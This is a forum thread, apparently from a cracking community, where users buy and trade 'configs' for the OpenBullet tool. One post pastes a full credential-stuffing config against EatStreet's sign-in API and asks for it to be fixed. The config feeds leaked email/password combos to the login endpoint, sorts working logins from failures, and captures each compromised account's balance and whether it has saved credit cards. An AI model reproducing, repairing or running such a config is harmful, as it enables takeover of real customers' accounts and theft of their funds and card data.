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  1. omg the best guy to go to for cheap config to be made thank you again dude ill be coming back for sure
  2. lets see if it work ill let yall no
  3. CAN SOMEBODY FIX THIS EATSTREET CONFIG FOR OB THE CONFIG RUNS BUT DONT GET HITS EVEN WHEN I PUT A TEST COMBO WITH A WORKING ACCOUNT ON IT THANK YOU THIS IS EVERTHING IN THE FILE [sETTINGS] { "Name": "eatstreet", "SuggestedBots": 1, "LastModified": "2018-09-02T07:34:27.2440389+00:00", "AdditionalInfo": "", "Author": "sqrt", "Version": "1.0.0", "NeedsProxies": false, "OnlySocks": false, "OnlySsl": false, "MaxProxyUses": 0, "AllowedWordlist1": "MailPass", "AllowedWordlist2": "None", "DataRules": [], "CustomInputs": [], "ForceHeadless": false, "AlwaysOpen": false, "AlwaysQuit": false, "DisableNotifications": false, "CustomUserAgent": "", "RandomUA": false, "CustomCMDArgs": "" } [sCRIPT] REQUEST POST "https://eatstreet.com/api/v2/signin" AutoRedirect=TRUE CONTENT "{\"email\":\"\",\"password\":\"\",\"reloadConfigs\":true}" CONTENTTYPE "application/json;charset=UTF-8" HEADER "Accept: application/json, text/plain, */*" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" HEADER "Pragma: no-cache" HEADER "Origin: https://eatstreet.com" HEADER "Referer: https://eatstreet.com/signin" HEADER "X-Requested-With: XMLHttpRequest" KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE KEYCHAIN Success OR KEY "\"user\"" KEYCHAIN Failure OR KEY "errors" #Balance PARSE " " LR "accountBalance\":" ",\"" Recursive=FALSE -> CAP "Account Balance" "" "" #Has_CC PARSE " " LR "\"creditCards\":[{\"" "}],\"" Recursive=FALSE -> CAP "Credit Cards?" "" ""